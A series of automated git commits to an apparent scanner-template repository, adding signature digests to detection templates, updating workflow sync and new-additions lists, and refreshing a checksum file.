http/cves/2024/CVE-2024-3495.yaml | 1 + http/misconfiguration/installer/activecollab-installer.yaml | 1 + http/misconfiguration/installer/glpi-installer.yaml | 1 + http/misconfiguration/installer/onlyoffice-installer.yaml | 1 + http/misconfiguration/installer/profittrailer-installer.yaml | 1 + http/misconfiguration/installer/virtual-smartzone-installer.yaml | 1 + 6 files changed, 6 insertions(+) diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml index 076e2dc12d..a3fa7388ff 100644 --- a/http/cves/2024/CVE-2024-3495.yaml +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -54,3 +54,4 @@ http: regex: - '"nonce":"(\S*)"' internal: true +# digest: 4a0a00473045022059c57bd6c82e74ce84c99c339ccc1b107f2cb6aec5fa053b73b7f1aaa77003ac022100d3b0c3a42c10b8421de519da2237f3784bfd8b8a8d01f55fc6b08c58c59860c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml index fc9b129292..e42398ec1b 100644 --- a/http/misconfiguration/installer/activecollab-installer.yaml +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml index 9db17a527d..e65f9aaa2e 100644 --- a/http/misconfiguration/installer/glpi-installer.yaml +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml index a8b696489d..757c6657d8 100644 --- a/http/misconfiguration/installer/onlyoffice-installer.yaml +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/profittrailer-installer.yaml b/http/misconfiguration/installer/profittrailer-installer.yaml index ed33927a01..9b73b8c8a6 100644 --- a/http/misconfiguration/installer/profittrailer-installer.yaml +++ b/http/misconfiguration/installer/profittrailer-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100bfeeeb0cf97f5d58c5ccd475480fadeae1023eb090798a02daa9ef76244d77ff0220343fd9ccc366f093849ef30ebba874a66e1abc777191c1883f2e507bff2ee338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/virtual-smartzone-installer.yaml b/http/misconfiguration/installer/virtual-smartzone-installer.yaml index 31adce8ade..29d3380861 100644 --- a/http/misconfiguration/installer/virtual-smartzone-installer.yaml +++ b/http/misconfiguration/installer/virtual-smartzone-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022009e0ca1dc058fbbf4b9f7f8404d01720418c9739a270a20eb0a4e5eb757908df02202dec851dfee50d028615def5235cae1d3cec190ebbfa8fdcf48d4bd396a49615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8e0012943c598c09d49ad5e4427473fb0e0f9767 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:02:25 +0000 Subject: [PATCH 1502/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b2ce32abd4..95fe545e9c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,15 +21,20 @@ on: - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/glpi-installer.yaml' + - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml' + - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' + - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' + - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From bd163a5f93498b2351ecfe4fded7850c587d9ddf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:02:37 +0000 Subject: [PATCH 1503/1768] Auto Generated New Template Addition List [Wed May 29 08:02:37 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0ba334f7b6..8b4a34a472 100644 --- a/.new-additions +++ b/.new-additions @@ -23,10 +23,12 @@ http/misconfiguration/installer/glpi-installer.yaml http/misconfiguration/installer/invicti-enterprise-installer.yaml http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml +http/misconfiguration/installer/justfans-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml +http/misconfiguration/installer/snipe-it-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml From d77b0d10ef4292b774ed4fcaf539a72fb9bd2453 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:02:44 +0000 Subject: [PATCH 1504/1768] Auto Generated Templates Checksum [Wed May 29 08:02:44 UTC 2024] :robot: --- templates-checksum.txt | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6697917805..ae73330b0c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3308,7 +3308,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-3495.yaml:060d2ed065c0100e109bbe6f050daabaa92b64db +http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 @@ -5394,7 +5394,7 @@ http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d6 http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff -http/misconfiguration/installer/activecollab-installer.yaml:36c1b4c95e44199ea20bc210c89205f8bef1cf2b +http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5439,7 +5439,7 @@ http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44 http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e -http/misconfiguration/installer/glpi-installer.yaml:7f389d140c85cf0335612ea2e2057de050230746 +http/misconfiguration/installer/glpi-installer.yaml:eff46c69565c0aea0245c4fde82e59b5e0fb2f00 http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa @@ -5447,8 +5447,11 @@ http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a7 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 +http/misconfiguration/installer/invoice-ninja-installer.yaml:1cc5ec76b7ec954a5a2a707c2e558ecff5f018ba +http/misconfiguration/installer/jfa-go-installer.yaml:55a1d406199affc4050e2691de8a844ed5828791 http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a +http/misconfiguration/installer/justfans-installer.yaml:ec7eee3a958238dc8416b8311a97218ac5dc2a23 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b @@ -5472,7 +5475,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/onlyoffice-installer.yaml:99ef19f5fdfb28ae627eaba3740df383b80b0550 +http/misconfiguration/installer/onlyoffice-installer.yaml:ee793f59fa6a84e9513907be49bd0a0944db1bfe http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5494,7 +5497,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/profittrailer-installer.yaml:234e41ef679963500411241f83a84f9f8f9facc5 +http/misconfiguration/installer/profittrailer-installer.yaml:7400afd0fc1552d5fc6e5dc1808e05294d9fe119 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 @@ -5526,7 +5529,7 @@ http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9 http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 -http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 +http/misconfiguration/installer/virtual-smartzone-installer.yaml:f8179584291b98fb14ac863562c3392d99276652 http/misconfiguration/installer/vtiger-installer.yaml:0db9526b5e94e1948f72d13820bb49a346afee5c http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f338c6812b515033579 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f @@ -8592,7 +8595,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e63cdb2330891dc01a81e7bbef7753c3694aa57a +templates-checksum.txt:5753cfeaef6359ce183d1ea0a77ceceb145bc3be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8d58dd86377befbac8a8013741db70f73f1f5a7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:03:24 +0000 Subject: [PATCH 1505/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 95fe545e9c..14de1e5d08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,10 +28,12 @@ on: - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml' - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' - 'http/misconfiguration/installer/jfa-go-installer.yaml' + - 'http/misconfiguration/installer/justfans-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' + - 'http/misconfiguration/installer/snipe-it-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' From 850fd82b162b88480b6b67043cabe0c650570077 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:03:27 +0000 Subject: [PATCH 1506/1768] Auto Generated New Template Addition List [Wed May 29 08:03:27 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 8b4a34a472..43681df415 100644 --- a/.new-additions +++ b/.new-additions @@ -24,6 +24,7 @@ http/misconfiguration/installer/invicti-enterprise-installer.yaml http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/justfans-installer.yaml +http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml @@ -31,6 +32,7 @@ http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/snipe-it-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml +http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml From e129630975f56c73927fe8711e1e09849d3bd725 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:03:35 +0000 Subject: [PATCH 1507/1768] Auto Generated Templates Checksum [Wed May 29 08:03:35 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ae73330b0c..e4ddd91daf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5510,6 +5510,7 @@ http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 +http/misconfiguration/installer/snipe-it-installer.yaml:d344b83caa3a3823c89653eee76405375aa9527b http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f @@ -5524,6 +5525,7 @@ http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7 http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 +http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 @@ -8595,7 +8597,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5753cfeaef6359ce183d1ea0a77ceceb145bc3be +templates-checksum.txt:c5c5920cb3e415a9dc318b40e8843abce8dec5ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 604fba3a9b3736e43516e17876540d21fa398669 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:04:16 +0000 Subject: [PATCH 1509/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 14de1e5d08..3305d463d8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -29,6 +29,7 @@ on: - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/justfans-installer.yaml' + - 'http/misconfiguration/installer/librenms-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' @@ -36,6 +37,7 @@ on: - 'http/misconfiguration/installer/snipe-it-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/tastyigniter-installer.yaml' + - 'http/misconfiguration/installer/ubersmith-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' From 3283a9c36198c7b80f3c8785469a73321430e0bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:04:25 +0000 Subject: [PATCH 1510/1768] Auto Template Signing [Wed May 29 08:04:25 UTC 2024] :robot: --- http/misconfiguration/installer/ejbca-enterprise-installer.yaml | 1 + .../misconfiguration/installer/invicti-enterprise-installer.yaml | 1 + http/misconfiguration/installer/invoice-ninja-installer.yaml | 1 + http/misconfiguration/installer/jfa-go-installer.yaml | 1 + http/misconfiguration/installer/justfans-installer.yaml | 1 + http/misconfiguration/installer/tastyigniter-installer.yaml | 1 + http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml | 1 + 7 files changed, 7 insertions(+) diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml index 149bfaba41..e0d89207e3 100644 --- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/invicti-enterprise-installer.yaml b/http/misconfiguration/installer/invicti-enterprise-installer.yaml index 97b5fd79e7..df60f23db4 100644 --- a/http/misconfiguration/installer/invicti-enterprise-installer.yaml +++ b/http/misconfiguration/installer/invicti-enterprise-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c9cbc9675e67389c9b71a1a4798202fde92a29809bcbaa633b62cc1f8d312a50022008ab9b41933532eb6fb1fb8033636cd2c0f6a1924648e93ee9e8bed00549c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/invoice-ninja-installer.yaml b/http/misconfiguration/installer/invoice-ninja-installer.yaml index 93c12f260b..61fd5b6a50 100644 --- a/http/misconfiguration/installer/invoice-ninja-installer.yaml +++ b/http/misconfiguration/installer/invoice-ninja-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502206e0d927418f5a6789e48f8b427edda11664ba45a9e6ac0dc19855c1f2afb388a022100a692a70a5192fe68f64f8ee34e21c62d742439864429f382a5ea47c4094cefc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/jfa-go-installer.yaml b/http/misconfiguration/installer/jfa-go-installer.yaml index 5909fa7972..647e5da44c 100644 --- a/http/misconfiguration/installer/jfa-go-installer.yaml +++ b/http/misconfiguration/installer/jfa-go-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205300e59818b7ace97d3c1b501b38973f73646a3839f479d2512f92b67eafbcd102203b603e8822a95f3e708d544c2374a684cb435a6a9bf83e2a0988534ad85fbe0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/justfans-installer.yaml b/http/misconfiguration/installer/justfans-installer.yaml index 14ec8c2232..4e671b2323 100644 --- a/http/misconfiguration/installer/justfans-installer.yaml +++ b/http/misconfiguration/installer/justfans-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100cfe023f042a72cda1b9e1ba395709391e57065de197d94979496d3cbd7e4fd360220065040ae36e9b95659abf63d8247b69fcd2dfad6241d7857938e0c50c4855332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml index a455d46fd5..adb01864c8 100644 --- a/http/misconfiguration/installer/tastyigniter-installer.yaml +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml index 2a4069893e..ec5c10f11c 100644 --- a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml +++ b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022030bc57b2bcb53760cbfc4d1d17bb419d39f3ccbe4c9873db930826271b4f183a02201b400def9b87893db012ede33e77d6686a3a1a7c528ed9d7d8f6b3578ffce359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 71501e19f03c13e382d80b89b41ed23be76449e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:11:01 +0000 Subject: [PATCH 1511/1768] Auto Generated New Template Addition List [Wed May 29 08:11:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 43681df415..8314acb106 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/activecollab-installer.yaml From f53fc1d8afeb8b2cd13f5e8d9c677d8d8666488f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:11:20 +0000 Subject: [PATCH 1512/1768] Auto Generated Templates Checksum [Wed May 29 08:11:20 UTC 2024] :robot: --- templates-checksum.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e4ddd91daf..a5ebc69c09 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3853,7 +3853,7 @@ http/exposed-panels/fortinet/fortinet-panel.yaml:f1798cfb14f2f54edc3d6746a402d17 http/exposed-panels/fortinet/fortios-management-panel.yaml:c7c0c4b9eed1b1a4546c3655439186718078d591 http/exposed-panels/fortinet/fortios-panel.yaml:d7766874f165089c3e1539b84d46d46984c52ae5 http/exposed-panels/fortinet/fortitester-login-panel.yaml:e366bffb4008cbd19a32a104d93251a042fdcbbf -http/exposed-panels/fortinet/fortiweb-panel.yaml:2e28730c4c47885d411f63ad31871e3d6253ca01 +http/exposed-panels/fortinet/fortiweb-panel.yaml:6893382e70ed550bd9f342d6e24e3a41ec921165 http/exposed-panels/fortinet/fortiwlm-panel.yaml:3260c3235302198e0168fba0ed389bc474ddfbd5 http/exposed-panels/freeipa-panel.yaml:0068757bb30eded3c0d933ee11d417e1800a854d http/exposed-panels/freepbx-administration-panel.yaml:3c250e83cf97aa3ef95b1c881b173a79e8cc7876 @@ -5425,7 +5425,7 @@ http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 -http/misconfiguration/installer/ejbca-enterprise-installer.yaml:c7a7e5fcbedd43a6ca347ae9acba4579fdb1ed24 +http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a @@ -5446,14 +5446,15 @@ http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0 